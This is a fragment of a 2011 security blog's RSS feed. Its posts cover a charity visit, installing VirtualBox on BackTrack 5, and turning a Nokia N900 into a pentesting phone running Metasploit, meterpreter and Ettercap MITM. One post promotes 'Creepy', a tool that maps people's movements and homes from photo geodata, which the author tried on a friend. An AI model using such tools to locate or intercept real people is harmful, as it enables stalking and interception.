			<content:encoded><![CDATA[<p><a href="http://www.hackersforcharity.org/johnny/about-johnny/" target="hfc"><br />
<img src="http://netsecuritystuff.files.wordpress.com/2011/03/hfc1.gif?w=108&#038;h=300" title="hfc" width="108" height="300" style="border:none;position:fixed;top:0;right:0;z-index:999;" alt="Hackers For Charity" /></a><br />
Just back from Uganda where I had gone for some business and also took time to visit Johnny long. He is doing well and his family is ok although he really needs your support. Today is the last day to vote for drobos so keep voting for HFC. <a href="http://www.hackersforcharity.org/hackers-for-charity/saving-lives-1-drobo-at-a-time/" title="http://www.hackersforcharity.org/hackers-for-charity/saving-lives-1-drobo-at-a-time/" target="_blank">http://www.hackersforcharity.org/hackers-for-charity/saving-lives-1-drobo-at-a-time/</a><br />
I also saw Sophos challenging lulzsec to follow in the way of Johnny long. Wouldnt that be something . <a href="http://nakedsecurity.sophos.com/2011/06/16/lulzsec-hackers-heres-a-real-challenge/" title="http://nakedsecurity.sophos.com/2011/06/16/lulzsec-hackers-heres-a-real-challenge/" target="_blank">http://nakedsecurity.sophos.com/2011/06/16/lulzsec-hackers-heres-a-real-challenge/</a><br />
It is always a pleasure meeting such a great and humble person like Johnny.Apart from catching up with Johnny and he gave me so much gear and swag. Here are some photos.</p>
<p>Johnny on &#8220;the beast&#8221;.He was beaten to the finish line by the guy on the far left carrying two bags of charcoal. <img src='https://s-ssl.wordpress.com/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' />   Its now easier to navigate Jinja with this bike. It was a miracle how Johnny got it, i guess he will soon blog about it.<br />
<a href="http://netsecuritystuff.files.wordpress.com/2011/06/johnny.jpg"><img src="http://netsecuritystuff.files.wordpress.com/2011/06/johnny.jpg?w=640" alt="" title="johnny"   class="alignnone size-full wp-image-254" /></a></p>
<p>Johnny`s presentation badge for Shmoocon <img src='https://s-ssl.wordpress.com/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' />  and notice the cool red blackhat bag.<br />
<a href="http://netsecuritystuff.files.wordpress.com/2011/06/badge.jpg"><img src="http://netsecuritystuff.files.wordpress.com/2011/06/badge.jpg?w=640" alt="" title="badge"   class="alignnone size-full wp-image-246" /></a></p>
<p>Shmoo mouse pad<br />
<a href="http://netsecuritystuff.files.wordpress.com/2011/06/shmoomousepad.jpg"><img src="http://netsecuritystuff.files.wordpress.com/2011/06/shmoomousepad.jpg?w=640" alt="" title="shmoomousepad"   class="alignnone size-full wp-image-248" /></a></p>
<p>Some hardware hacking stuff, you had to program it to read ninja party to be allowed to the party<br />
<a href="http://netsecuritystuff.files.wordpress.com/2011/06/hwhacking.jpg"><img src="http://netsecuritystuff.files.wordpress.com/2011/06/hwhacking.jpg?w=640" alt="" title="hwhacking"   class="alignnone size-full wp-image-249" /></a></p>
<p>This shirt is to kill for.. literally . It is a collectors item that has a different logo at the back. It was specifically for the shmoocon conference. I am honored to get this.<br />
<a href="http://netsecuritystuff.files.wordpress.com/2011/06/shirt.jpg"><img src="http://netsecuritystuff.files.wordpress.com/2011/06/shirt.jpg?w=640" alt="" title="shirt"   class="alignnone size-full wp-image-251" /></a></p>
<p>HFC stickers to spread the word to all the world<br />
<a href="http://netsecuritystuff.files.wordpress.com/2011/06/stickers.jpg"><img src="http://netsecuritystuff.files.wordpress.com/2011/06/stickers.jpg?w=640" alt="" title="stickers"   class="alignnone size-full wp-image-252" /></a></p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/netsecuritystuff.wordpress.com/237/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/netsecuritystuff.wordpress.com/237/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/netsecuritystuff.wordpress.com/237/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/netsecuritystuff.wordpress.com/237/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/netsecuritystuff.wordpress.com/237/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/netsecuritystuff.wordpress.com/237/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/netsecuritystuff.wordpress.com/237/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/netsecuritystuff.wordpress.com/237/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/netsecuritystuff.wordpress.com/237/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/netsecuritystuff.wordpress.com/237/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/netsecuritystuff.wordpress.com/237/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/netsecuritystuff.wordpress.com/237/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/netsecuritystuff.wordpress.com/237/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/netsecuritystuff.wordpress.com/237/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=netsecuritystuff.wordpress.com&amp;blog=19477772&amp;post=237&amp;subd=netsecuritystuff&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>https://netsecuritystuff.wordpress.com/2011/06/17/i-got-pimped-by-hfc/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="https://secure.gravatar.com/avatar/c6583c9496cf8354bacbd775fae943b3?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">watathi</media:title>
		</media:content>

		<media:content url="http://netsecuritystuff.files.wordpress.com/2011/03/hfc1.gif?w=108" medium="image">
			<media:title type="html">hfc</media:title>
		</media:content>

		<media:content url="http://netsecuritystuff.files.wordpress.com/2011/06/johnny.jpg" medium="image">
			<media:title type="html">johnny</media:title>
		</media:content>

		<media:content url="http://netsecuritystuff.files.wordpress.com/2011/06/badge.jpg" medium="image">
			<media:title type="html">badge</media:title>
		</media:content>

		<media:content url="http://netsecuritystuff.files.wordpress.com/2011/06/shmoomousepad.jpg" medium="image">
			<media:title type="html">shmoomousepad</media:title>
		</media:content>

		<media:content url="http://netsecuritystuff.files.wordpress.com/2011/06/hwhacking.jpg" medium="image">
			<media:title type="html">hwhacking</media:title>
		</media:content>

		<media:content url="http://netsecuritystuff.files.wordpress.com/2011/06/shirt.jpg" medium="image">
			<media:title type="html">shirt</media:title>
		</media:content>

		<media:content url="http://netsecuritystuff.files.wordpress.com/2011/06/stickers.jpg" medium="image">
			<media:title type="html">stickers</media:title>
		</media:content>
	</item>
		<item>
		<title>Installing VirtualBox on Backtrack 5</title>
		<link>https://netsecuritystuff.wordpress.com/2011/05/23/virtualbox-on-backtrack-5/</link>
		<comments>https://netsecuritystuff.wordpress.com/2011/05/23/virtualbox-on-backtrack-5/#comments</comments>
		<pubDate>Mon, 23 May 2011 13:52:05 +0000</pubDate>
		<dc:creator>watathi</dc:creator>
				<category><![CDATA[Uncategorized]]></category>

		<guid isPermaLink="false">http://netsecuritystuff.wordpress.com/?p=223</guid>
		<description><![CDATA[Backtrack 5 doesnt come with the kernel headers installed.So you will need to download them and then proceed with installing virtualbox. The commands are listed below root@bt # prepare-kernel-sources root@bt # cd /usr/src/linux root@bt # cp -rf include/generated/* include/linux/ After &#8230; <a href="https://netsecuritystuff.wordpress.com/2011/05/23/virtualbox-on-backtrack-5/">Continue reading <span class="meta-nav">&#8594;</span></a><img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=netsecuritystuff.wordpress.com&amp;blog=19477772&amp;post=223&amp;subd=netsecuritystuff&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p><a href="http://www.hackersforcharity.org/johnny/about-johnny/" target="hfc"><br />
<img src="http://netsecuritystuff.files.wordpress.com/2011/03/hfc1.gif?w=108&#038;h=300" title="hfc" width="108" height="300" style="border:none;position:fixed;top:0;right:0;z-index:999;" alt="Hackers For Charity" /></a><br />
Backtrack 5 doesnt come with the kernel headers installed.So you will need to download them and then proceed with installing virtualbox. The commands are listed below</p>
<p>root@bt #<span style="color:red;"> prepare-kernel-sources</span><br />
root@bt #<span style="color:red;"> cd /usr/src/linux</span><br />
root@bt #<span style="color:red;"> cp -rf include/generated/* include/linux/</span><br />
</font><br />
After this is done, edit /etc/apt/sources.list as shown below and download virtualbox</p>
<p>root@bt #<span style="color:red;"> echo deb http://download.virtualbox.org/virtualbox/debian lucid contrib non-free &gt;&gt; /etc/apt/sources.list</span></p>
<p>root@bt #<span style="color:red;"> wget -q http://download.virtualbox.org/virtualbox/debian/oracle_vbox.asc -O- | sudo apt-key add -</span></p>
<p>root@bt #<span style="color:red;"> apt-get update</span></p>
<p>root@bt #<span style="color:red;"> apt-cache search virtualbox</span></p>
<p>root@bt #<span style="color:red;"> apt-get install virtualbox-4.0</span></p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/netsecuritystuff.wordpress.com/223/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/netsecuritystuff.wordpress.com/223/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/netsecuritystuff.wordpress.com/223/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/netsecuritystuff.wordpress.com/223/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/netsecuritystuff.wordpress.com/223/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/netsecuritystuff.wordpress.com/223/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/netsecuritystuff.wordpress.com/223/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/netsecuritystuff.wordpress.com/223/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/netsecuritystuff.wordpress.com/223/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/netsecuritystuff.wordpress.com/223/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/netsecuritystuff.wordpress.com/223/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/netsecuritystuff.wordpress.com/223/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/netsecuritystuff.wordpress.com/223/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/netsecuritystuff.wordpress.com/223/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=netsecuritystuff.wordpress.com&amp;blog=19477772&amp;post=223&amp;subd=netsecuritystuff&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>https://netsecuritystuff.wordpress.com/2011/05/23/virtualbox-on-backtrack-5/feed/</wfw:commentRss>
		<slash:comments>45</slash:comments>
	
		<media:content url="https://secure.gravatar.com/avatar/c6583c9496cf8354bacbd775fae943b3?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">watathi</media:title>
		</media:content>

		<media:content url="http://netsecuritystuff.files.wordpress.com/2011/03/hfc1.gif?w=108" medium="image">
			<media:title type="html">hfc</media:title>
		</media:content>
	</item>
		<item>
		<title>Backtrack5 on the nokia n900</title>
		<link>https://netsecuritystuff.wordpress.com/2011/05/18/backtrack5-on-the-nokia-n900/</link>
		<comments>https://netsecuritystuff.wordpress.com/2011/05/18/backtrack5-on-the-nokia-n900/#comments</comments>
		<pubDate>Wed, 18 May 2011 20:13:45 +0000</pubDate>
		<dc:creator>watathi</dc:creator>
				<category><![CDATA[Uncategorized]]></category>

		<guid isPermaLink="false">http://netsecuritystuff.wordpress.com/?p=214</guid>
		<description><![CDATA[Just managed to get my sweet nokia n900 phone to run Bt5 . For me to write a tutorial on this would be an injustice because the steps have been documented properly in this blog http://pcsci3nce.info/?p=177 Below is a screenshot &#8230; <a href="https://netsecuritystuff.wordpress.com/2011/05/18/backtrack5-on-the-nokia-n900/">Continue reading <span class="meta-nav">&#8594;</span></a><img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=netsecuritystuff.wordpress.com&amp;blog=19477772&amp;post=214&amp;subd=netsecuritystuff&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p><a href="http://www.hackersforcharity.org/johnny/about-johnny/" target="hfc"><br />
<img src="http://netsecuritystuff.files.wordpress.com/2011/03/hfc1.gif?w=108&#038;h=300" title="hfc" width="108" height="300" style="border:none;position:fixed;top:0;right:0;z-index:999;" alt="Hackers For Charity" /></a><br />
Just managed to get my sweet nokia n900 phone to run Bt5 <img src='https://s-ssl.wordpress.com/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> . For me to write a tutorial on this would be an injustice because the steps have been documented properly in this blog  <a href="http://pcsci3nce.info/?p=177" title=" http://pcsci3nce.info/?p=177" target="_blank">http://pcsci3nce.info/?p=177</a></p>
<p>Below is a screenshot of my phone. </p>
<p><a href="http://netsecuritystuff.files.wordpress.com/2011/05/nokian900.png"><img src="http://netsecuritystuff.files.wordpress.com/2011/05/nokian900.png?w=640&#038;h=384" alt="" title="nokian900" width="640" height="384" class="alignnone size-full wp-image-218" /></a></p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/netsecuritystuff.wordpress.com/214/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/netsecuritystuff.wordpress.com/214/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/netsecuritystuff.wordpress.com/214/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/netsecuritystuff.wordpress.com/214/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/netsecuritystuff.wordpress.com/214/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/netsecuritystuff.wordpress.com/214/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/netsecuritystuff.wordpress.com/214/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/netsecuritystuff.wordpress.com/214/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/netsecuritystuff.wordpress.com/214/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/netsecuritystuff.wordpress.com/214/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/netsecuritystuff.wordpress.com/214/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/netsecuritystuff.wordpress.com/214/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/netsecuritystuff.wordpress.com/214/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/netsecuritystuff.wordpress.com/214/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=netsecuritystuff.wordpress.com&amp;blog=19477772&amp;post=214&amp;subd=netsecuritystuff&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>https://netsecuritystuff.wordpress.com/2011/05/18/backtrack5-on-the-nokia-n900/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="https://secure.gravatar.com/avatar/c6583c9496cf8354bacbd775fae943b3?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">watathi</media:title>
		</media:content>

		<media:content url="http://netsecuritystuff.files.wordpress.com/2011/03/hfc1.gif?w=108" medium="image">
			<media:title type="html">hfc</media:title>
		</media:content>

		<media:content url="http://netsecuritystuff.files.wordpress.com/2011/05/nokian900.png" medium="image">
			<media:title type="html">nokian900</media:title>
		</media:content>
	</item>
		<item>
		<title>Creepy&#8230;&#8230;&#8230;&#8230;&#8230;.</title>
		<link>https://netsecuritystuff.wordpress.com/2011/03/31/creepy/</link>
		<comments>https://netsecuritystuff.wordpress.com/2011/03/31/creepy/#comments</comments>
		<pubDate>Thu, 31 Mar 2011 11:51:01 +0000</pubDate>
		<dc:creator>watathi</dc:creator>
				<category><![CDATA[Uncategorized]]></category>

		<guid isPermaLink="false">http://netsecuritystuff.wordpress.com/?p=200</guid>
		<description><![CDATA[Last year at Dojocon, Dave Marcus gave a really awesome talk about Using Social Networks To Profile, Find and 0wn Your Victims. During the video, he was able to track a person from twitter geodata a person using loic to &#8230; <a href="https://netsecuritystuff.wordpress.com/2011/03/31/creepy/">Continue reading <span class="meta-nav">&#8594;</span></a><img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=netsecuritystuff.wordpress.com&amp;blog=19477772&amp;post=200&amp;subd=netsecuritystuff&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p><a href="http://www.hackersforcharity.org/johnny/about-johnny/" target="hfc"><br />
<img src="http://netsecuritystuff.files.wordpress.com/2011/03/hfc1.gif?w=108&#038;h=300" title="hfc" width="108" height="300" style="border:none;position:fixed;top:0;right:0;z-index:999;" alt="Hackers For Charity" /></a><br />
Last year at Dojocon, Dave Marcus gave a really awesome talk about <a href="http://www.irongeek.com/i.php?page=videos/dojocon-2010-videos#Using%20Social%20Networks%20To%20Profile,%20Find%20and%200wn%20Your%20Victims">Using Social Networks To Profile, Find and 0wn Your Victims</a>. During the video, he was able to track a person from twitter geodata a person using loic to peform a distributed denian of service (ddos) .<br />
Guess what, now there is a software realased to do this mainstream. Thanks to Yiannis Kakavas, creepy is alive. All you need is the twitter id or Flickr username of someone. It finds phots that somebody uploaded, extracts geolocation information from these pics and maps exactly where the data came from. It is possible for you to track somebody`s movement over time and even locate their home, if they ever twweted from home.  This awesome information gathering tool can be found here. <a href="https://github.com/ilektrojohn/creepy/downloads">https://github.com/ilektrojohn/creepy/downloads</a><br />
Its time to turn off gps geolaction features  on our phones. Kindly read more about the tool here.<a href="http://www.thinq.co.uk/2011/3/30/creepy-app-warns-end-privacy/">http://www.thinq.co.uk/2011/3/30/creepy-app-warns-end-privacy/</a><br />
I used a friends twitter id and pulled the map below.Now that is really creepy <img src='https://s-ssl.wordpress.com/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
<p>User interface<br />
<a href="http://netsecuritystuff.files.wordpress.com/2011/03/snapshot19.png"><img src="http://netsecuritystuff.files.wordpress.com/2011/03/snapshot19.png?w=640&#038;h=451" alt="" title="snapshot19" width="640" height="451" class="alignnone size-full wp-image-203" /></a></p>
<p>Feed the username and get your data.<br />
<a href="http://netsecuritystuff.files.wordpress.com/2011/03/snapshot18.png"><img src="http://netsecuritystuff.files.wordpress.com/2011/03/snapshot18.png?w=640&#038;h=458" alt="" title="snapshot18" width="640" height="458" class="alignnone size-full wp-image-204" /></a></p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/netsecuritystuff.wordpress.com/200/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/netsecuritystuff.wordpress.com/200/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/netsecuritystuff.wordpress.com/200/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/netsecuritystuff.wordpress.com/200/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/netsecuritystuff.wordpress.com/200/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/netsecuritystuff.wordpress.com/200/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/netsecuritystuff.wordpress.com/200/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/netsecuritystuff.wordpress.com/200/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/netsecuritystuff.wordpress.com/200/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/netsecuritystuff.wordpress.com/200/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/netsecuritystuff.wordpress.com/200/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/netsecuritystuff.wordpress.com/200/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/netsecuritystuff.wordpress.com/200/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/netsecuritystuff.wordpress.com/200/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=netsecuritystuff.wordpress.com&amp;blog=19477772&amp;post=200&amp;subd=netsecuritystuff&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>https://netsecuritystuff.wordpress.com/2011/03/31/creepy/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="https://secure.gravatar.com/avatar/c6583c9496cf8354bacbd775fae943b3?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">watathi</media:title>
		</media:content>

		<media:content url="http://netsecuritystuff.files.wordpress.com/2011/03/hfc1.gif?w=108" medium="image">
			<media:title type="html">hfc</media:title>
		</media:content>

		<media:content url="http://netsecuritystuff.files.wordpress.com/2011/03/snapshot19.png" medium="image">
			<media:title type="html">snapshot19</media:title>
		</media:content>

		<media:content url="http://netsecuritystuff.files.wordpress.com/2011/03/snapshot18.png" medium="image">
			<media:title type="html">snapshot18</media:title>
		</media:content>
	</item>
		<item>
		<title>Nokia n900</title>
		<link>https://netsecuritystuff.wordpress.com/2011/03/28/nokia-n900/</link>
		<comments>https://netsecuritystuff.wordpress.com/2011/03/28/nokia-n900/#comments</comments>
		<pubDate>Mon, 28 Mar 2011 11:39:16 +0000</pubDate>
		<dc:creator>watathi</dc:creator>
				<category><![CDATA[Uncategorized]]></category>

		<guid isPermaLink="false">http://netsecuritystuff.wordpress.com/?p=119</guid>
		<description><![CDATA[I finally managed to get my hands on a Nokia n900 series. I will let the pictures do the talking, but it is just the most awesome phone to have. I had so much fun configuring it to work as &#8230; <a href="https://netsecuritystuff.wordpress.com/2011/03/28/nokia-n900/">Continue reading <span class="meta-nav">&#8594;</span></a><img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=netsecuritystuff.wordpress.com&amp;blog=19477772&amp;post=119&amp;subd=netsecuritystuff&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p><a href="http://www.hackersforcharity.org/johnny/about-johnny/" target="hfc"><br />
<img src="http://netsecuritystuff.files.wordpress.com/2011/03/hfc1.gif?w=108&#038;h=300" title="hfc" width="108" height="300" style="border:none;position:fixed;top:0;right:0;z-index:999;" alt="Hackers For Charity" /></a></p>
<p>I finally managed to get my hands on a Nokia n900 series. I will let the pictures do the talking, but it is just the most awesome phone to have. I had so much fun configuring it to work as my ultimate pentesting phone. Packet injection works ok, so many pentesting tools can be installed.  Enjoy my phones screenshots.   There is a series for &#8220;weaponizing the nokia n900&#8243; and also there are interesting tutorials at the following links:<br />
<a href="https://www.infosecisland.com/blogview/5640-Weaponizing-the-Nokia-N900-Part-1.html">https://www.infosecisland.com/blogview/5640-Weaponizing-the-Nokia-N900-Part-1.html</a><br />
<a href="https://www.infosecisland.com/blogview/9921-Weaponizing-the-Nokia-N900-Part-3.html">https://www.infosecisland.com/blogview/9921-Weaponizing-the-Nokia-N900-Part-3.html</a><br />
<a href="https://www.infosecisland.com/blogview/8056-Weaponizing-the-Nokia-N900-Part-2.html">https://www.infosecisland.com/blogview/8056-Weaponizing-the-Nokia-N900-Part-2.html</a><br />
<a href="http://zitstif.no-ip.org/?p=451">http://zitstif.no-ip.org/?p=451</a><br />
<a href="http://zitstif.no-ip.org/?p=459">http://zitstif.no-ip.org/?p=459</a><br />
<a href="http://www.knownokia.ca/">http://www.knownokia.ca/</a><br />
<a href="http://pwnieexpress.com/pwn_phone.html">http://pwnieexpress.com/pwn_phone.html.</a></p>
<p>The innocent looking phone.<br />
<a href="http://netsecuritystuff.files.wordpress.com/2011/03/nokia-n900-dscf41721.jpg"><img src="http://netsecuritystuff.files.wordpress.com/2011/03/nokia-n900-dscf41721.jpg?w=300&#038;h=224" alt="" title="Nokia-N900-DSCF4172" width="300" height="224" class="alignnone size-medium wp-image-157" /></a></p>
<p>My &#8220;desktop&#8221;<br />
<a href="http://netsecuritystuff.files.wordpress.com/2011/03/screenshot-20110328-1430511.png"><img src="http://netsecuritystuff.files.wordpress.com/2011/03/screenshot-20110328-1430511.png?w=640" alt="" title="Menus"   class="alignnone size-full wp-image-125" /></a></p>
<p>The debian lxde and you can also chroot to /home. I love the game crazy chicken. Really easy and fun to play.Dont judge me <img src='https://s-ssl.wordpress.com/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /><br />
<a href="http://netsecuritystuff.files.wordpress.com/2011/03/screenshot-20110328-1431181.png"><img src="http://netsecuritystuff.files.wordpress.com/2011/03/screenshot-20110328-1431181.png?w=500&#038;h=300" alt="" title="Screenshot-20110328-143118" width="500" height="300" class="alignnone size-medium wp-image-127" /></a></p>
<p>looks familiar ? M still testing and reconfiguring most tools from my backtrack distro.<br />
<a href="http://netsecuritystuff.files.wordpress.com/2011/03/screenshot-20110328-1309551.png"><img src="http://netsecuritystuff.files.wordpress.com/2011/03/screenshot-20110328-1309551.png?w=500&#038;h=300" alt="" title="Screenshot-20110328-130955" width="500" height="300" class="alignnone size-medium wp-image-136" /></a></p>
<p>Metasploit on the n900, need i say more &#8230;&#8230;.<br />
<a href="http://netsecuritystuff.files.wordpress.com/2011/03/screenshot-20110328-094559.png"><img src="http://netsecuritystuff.files.wordpress.com/2011/03/screenshot-20110328-094559.png?w=500&#038;h=300" alt="" title="Screenshot-20110328-094559" width="500" height="300" class="alignnone size-medium wp-image-137" /></a></p>
<p><a href="http://netsecuritystuff.files.wordpress.com/2011/03/screenshot-20110327-1515571.png"><img src="http://netsecuritystuff.files.wordpress.com/2011/03/screenshot-20110327-1515571.png?w=500&#038;h=300" alt="" title="Screenshot-20110327-151557" width="500" height="300" class="alignnone size-medium wp-image-138" /></a></p>
<p><a href="http://netsecuritystuff.files.wordpress.com/2011/03/screenshot-20110327-1516451.png"><img src="http://netsecuritystuff.files.wordpress.com/2011/03/screenshot-20110327-1516451.png?w=500&#038;h=300" alt="" title="Screenshot-20110327-151645" width="500" height="300" class="alignnone size-medium wp-image-139" /></a><br />
Yes thats meterpreter <img src='https://s-ssl.wordpress.com/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
<p>Ettercap for mitm. Its possible to combine this with ssltrip <img src='https://s-ssl.wordpress.com/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /><br />
<a href="http://netsecuritystuff.files.wordpress.com/2011/03/screenshot-20110327-1935341.png"><img src="http://netsecuritystuff.files.wordpress.com/2011/03/screenshot-20110327-1935341.png?w=500&#038;h=300" alt="" title="Screenshot-20110327-193534" width="500" height="300" class="alignnone size-medium wp-image-140" /></a></p>
<p>Packet Injection works with the bleeding-edge wl1251 driver<br />
<a href="http://netsecuritystuff.files.wordpress.com/2011/03/screenshot-20110328-1341571.png"><img src="http://netsecuritystuff.files.wordpress.com/2011/03/screenshot-20110328-1341571.png?w=500&#038;h=300" alt="" title="Screenshot-20110328-134157" width="500" height="300" class="alignnone size-medium wp-image-150" /></a></p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/netsecuritystuff.wordpress.com/119/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/netsecuritystuff.wordpress.com/119/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/netsecuritystuff.wordpress.com/119/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/netsecuritystuff.wordpress.com/119/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/netsecuritystuff.wordpress.com/119/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/netsecuritystuff.wordpress.com/119/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/netsecuritystuff.wordpress.com/119/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/netsecuritystuff.wordpress.com/119/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/netsecuritystuff.wordpress.com/119/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/netsecuritystuff.wordpress.com/119/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/netsecuritystuff.wordpress.com/119/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/netsecuritystuff.wordpress.com/119/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/netsecuritystuff.wordpress.com/119/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/netsecuritystuff.wordpress.com/119/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=netsecuritystuff.wordpress.com&amp;blog=19477772&amp;post=119&amp;subd=netsecuritystuff&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>https://netsecuritystuff.wordpress.com/2011/03/28/nokia-n900/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="https://secure.gravatar.com/avatar/c6583c9496cf8354bacbd775fae943b3?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">watathi</media:title>
		</media:content>

		<media:content url="http://netsecuritystuff.files.wordpress.com/2011/03/hfc1.gif?w=108" medium="image">
			<media:title type="html">hfc</media:title>
		</media:content>

		<media:content url="http://netsecuritystuff.files.wordpress.com/2011/03/nokia-n900-dscf41721.jpg?w=300" medium="image">
			<media:title type="html">Nokia-N900-DSCF4172</media:title>
		</media:content>

		<media:content url="http://netsecuritystuff.files.wordpress.com/2011/03/screenshot-20110328-1430511.png" medium="image">
			<media:title type="html">Menus</media:title>
		</media:content>

		<media:content url="http://netsecuritystuff.files.wordpress.com/2011/03/screenshot-20110328-1431181.png?w=300" medium="image">
			<media:title type="html">Screenshot-20110328-143118</media:title>
		</media:content>

